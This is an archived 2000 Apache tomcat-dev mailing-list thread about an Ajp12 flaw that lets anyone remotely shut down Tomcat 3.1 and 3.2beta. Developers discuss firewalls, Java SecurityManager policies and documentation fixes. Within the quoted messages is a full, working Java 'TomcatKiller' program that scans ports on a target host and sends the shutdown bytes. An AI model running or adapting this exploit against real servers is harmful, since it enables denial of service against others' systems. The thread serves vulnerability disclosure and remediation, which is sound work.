Return-Path: Mailing-List: contact tomcat-dev-help@jakarta.apache.org; run by ezmlm Delivered-To: mailing list tomcat-dev@jakarta.apache.org Received: (qmail 78162 invoked from network); 6 Oct 2000 15:11:14 -0000 Received: from vortex.more.net (198.209.253.169) by locus.apache.org with SMTP; 6 Oct 2000 15:11:14 -0000 Received: from voyager.apg.more.net (b5fan.spg.more.net [207.160.133.142]) by vortex.more.net (8.11.0/8.11.0) with ESMTP id e96FBDu02796 for ; Fri, 6 Oct 2000 10:11:13 -0500 (CDT) Sender: glenn@more.net Message-ID: <39DDEB91.BBD2210D@voyager.apg.more.net> Date: Fri, 06 Oct 2000 10:11:13 -0500 From: Glenn Nielsen Organization: MOREnet X-Mailer: Mozilla 4.7 [en] (X11; I; SunOS 5.7 i86pc) X-Accept-Language: en MIME-Version: 1.0 To: tomcat-dev@jakarta.apache.org Subject: Re: Tomcat Security Vulnerability References: <5E5BF8E44723D4119B6D00508BCC219A0202B3F5@mail1.hq.portera.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Spam-Rating: locus.apache.org 1.6.2 0/1000/N Use of the Java SecurityManager requires a JVM version >= 1.2. And we are still committed to shipping a version of Tomcat that compiles/runs under JVM 1.1.x. So I don't think we should setup the security manager by default. We might be able to provide an example server.xml and tomcat.policy file. I might have to make some minor changes to the tomcat_security.html docs from 3.3 so that it matches the 3.2 release. I have not been playing around with the 3.2 release branch, only the 3.3dev branch. I'll get 3.2 release and do a final test of configuring/using the security manager and update the tomcat_security.html file for the 3.2 release. Regards, Glenn Michael Percy wrote: > > Then we need to get all the latest (applicable) docs into the 3.2 release... > and get everyone off of 3.1 and onto 3.2 ASAP. Possibly configure Tomcat to > build with this packet filtering on the standard port(s) by default? > > Regards, > Mike > > > -----Original Message----- > > From: Glenn Nielsen [mailto:glenn@voyager.apg.more.net] > > Sent: Thursday, October 05, 2000 5:20 PM > > To: tomcat-dev@jakarta.apache.org > > Subject: Re: Tomcat Security Vulnerability > > > > > > If you checkout the 3.3dev version from CVS you will find a > > link in the > > docs to tomcat_security.html. This page documents how to use Tomcat > > with the java security manager. In that doc it shows an > > example of how > > to configure a tomcat.policy file to do IP filtering of where > > tomcat will > > accept requests from on port 8007 using the java security manager. > > > > As of tomcat 3.2, support for the java security manager has > > been added. > > > > Regards, > > > > Glenn > > > > Michael Percy wrote: > > > > > > All, > > > Since I am uncertain how many of you check the tomcat-user > > list often, and I > > > am not personally a Java developer, I wanted to get you all > > in the loop on > > > this (and hopefully get some discussion going on a > > solution). What I am > > > talking about is the "Tomcat Killer" thread on tomcat-user > > over the past > > > hour. I have pasted in the mentioned thread below, in hopes > > that the people > > > who can do somthing about it (the developers) will have > > comments on it. I am > > > also curious as to whether or not ajpv13 is susceptible to > > this kind of > > > attack, and am not sure how to go about finding out. > > > > > > Regards, > > > > > > Michael Percy > > > QA Automation Eng. > > > Portera Systems > > > > > > > -----Original Message----- > > > > From: Michael Percy [mailto:mpercy@portera.com] > > > > Sent: Thursday, October 05, 2000 1:36 PM > > > > To: 'tomcat-user@jakarta.apache.org' > > > > Subject: RE: Tomcat Killer > > > > > > > > > > > > I'd like to point out that many people who wish to run Tomcat > > > > (at home, on a > > > > LAN, etc.) do not have a spare machine/router to filter > > > > packets. Plus, many > > > > setups include multiple ports on which different connectors > > > > run (to keep > > > > configurations separate, etc.) so one cannot just firewall > > > > 8007 and proclaim > > > > all is well. This is very dangerous and should be > > > > changed/patched/upgraded! > > > > If Tomcat requires a firewall to be run safely, then it is > > > > NOT a secure > > > > product (it relies on the security of other, unrelated people and > > > > products!). This must be taken care of. > > > > > > > > On a related note, does anyone know if the JNI connector is > > > > susceptible to > > > > this? If not, then this can be a short-term workaround (does > > > > it work yet?). > > > > > > > > > > > > Regards, > > > > > > > > Michael Percy > > > > QA Automation Eng. > > > > Portera Systems > > > > > > > > > > > > > -----Original Message----- > > > > > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com] > > > > > Sent: Thursday, October 05, 2000 1:27 PM > > > > > To: 'tomcat-user@jakarta.apache.org' > > > > > Subject: RE: Tomcat Killer > > > > > > > > > > > > > > > You would think that has long as your firewall only allows > > > > > access to port 80 > > > > > and or 8080 and not 8007 then you would be fine. Nice > > find though. > > > > > > > > > > Josh > > > > > > > > > > -----Original Message----- > > > > > From: Sean Schofield [mailto:sean@schof.com] > > > > > Sent: Thursday, October 05, 2000 1:23 PM > > > > > To: tomcat-user@jakarta.apache.org > > > > > Subject: Re: Tomcat Killer > > > > > > > > > > > > > > > Cool find! > > > > > > > > > > Couldn't this be protected against by a firewall filtering > > > > > incoming traffic > > > > > so both Apache and Tomcat are behind a firewall to the > > > > Intrenet and a > > > > > another firewall between these servers and the LAN? Then you > > > > > would only > > > > > have to worry about other servlets, etc. within the firewall > > > > > messing things > > > > > up. And even then I think you need root to create sockets > > > > don't you? > > > > > > > > > > Should this be posted to Bugtraq? > > > > > > > > > > - schof > > > > > > > > > > At 12:51 PM 10/5/00 -0700, you wrote: > > > > > > > > > > >Hi all, just a word of warning about Tomcat 3.1 and > > from what I can > > > > > >tell, 3.2beta4. Looking at the source code, if you're > > using Ajp12 for > > > > > >the Apache-Tomcat comms protocol, be aware that the > > "Stop Tomcat" > > > > > >batch/shell file does its job by sending "exit please" bytes to > > > > > >Tomcat. It doesn't take much to spoof this, here's my > > TomcatKiller > > > > > >class below. Just guess a host and port which may have Tomcat > > > > > >running, and over it goes... > > > > > > > > > > > >I patched the sources so hopefully it won't happen to me ;) > > > > > > > > > > > > > > > > > >import java.net.*; > > > > > >import java.io.*; > > > > > > > > > > > >public class TomcatKiller { > > > > > > > > > > > > static public void main( String[] args ) { > > > > > > > > > > > > final byte SIGNAL = (byte)254; > > > > > > final byte BYEBYE = (byte)15; > > > > > > byte[] msg = { SIGNAL, BYEBYE }; > > > > > > > > > > > > int min = 8007, max = 8007; > > > > > > String host = args[0]; > > > > > > > > > > > > try { > > > > > > if( args.length > 1 ) > > > > > > min = max = > > > > > Integer.parseInt( args[1] ); > > > > > > if( args.length > 2 ) > > > > > > max = > > Integer.parseInt( args[2] ); > > > > > > if( min > max ) { > > > > > > int tmp = min; > > > > > > min = max; > > > > > > max = tmp; > > > > > > } > > > > > > for( int i = min; i <= max; i++ ) { > > > > > > try { > > > > > > Socket s = new > > > > > Socket( host, i ); > > > > > > OutputStream os = > > > > > > s.getOutputStream(); > > > > > > os.write( msg ); > > > > > > os.flush(); > > > > > > break; > > > > > > } catch( > > ConnectException ce ) { > > > > > > System.err.println( > > > > > "conn refused > > > > > > " + i ); > > > > > > } catch( IOException ioe ) { > > > > > > ioe.printStackTrace(); > > > > > > break; > > > > > > } > > > > > > } > > > > > > } catch( Exception e ) { > > > > > > e.printStackTrace(); > > > > > > System.exit( 1 ); > > > > > > } > > > > > > } > > > > > >} > > > > > > > > > > > >// eof > > > > > > > > > > > > > > > > > >stu > > > > > > > > > > > > > > > > > >-- > > > > > >Stuart Maclean, Research Associate > > > > > >University of Washington > > > > > >ITS Research Program, College of Engineering > > > > > >Box 352500 > > > > > >Seattle, WA 98195-2500 > > > > > >Tel: (206) 543-0637 > > > > > >http://www.its.washington.edu > > > > > > > > > > > > > > > > > --------------------------------------------------------------------- > > > To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org > > > For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org > > > > -- > > ---------------------------------------------------------------------- > > Glenn Nielsen glenn@more.net | /* Spelin donut madder | > > MOREnet System Programming | * if iz ina coment. | > > Missouri Research and Education Network | */ | > > ---------------------------------------------------------------------- > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org > > For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org > For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org -- ---------------------------------------------------------------------- Glenn Nielsen glenn@more.net | /* Spelin donut madder | MOREnet System Programming | * if iz ina coment. | Missouri Research and Education Network | */ | ----------------------------------------------------------------------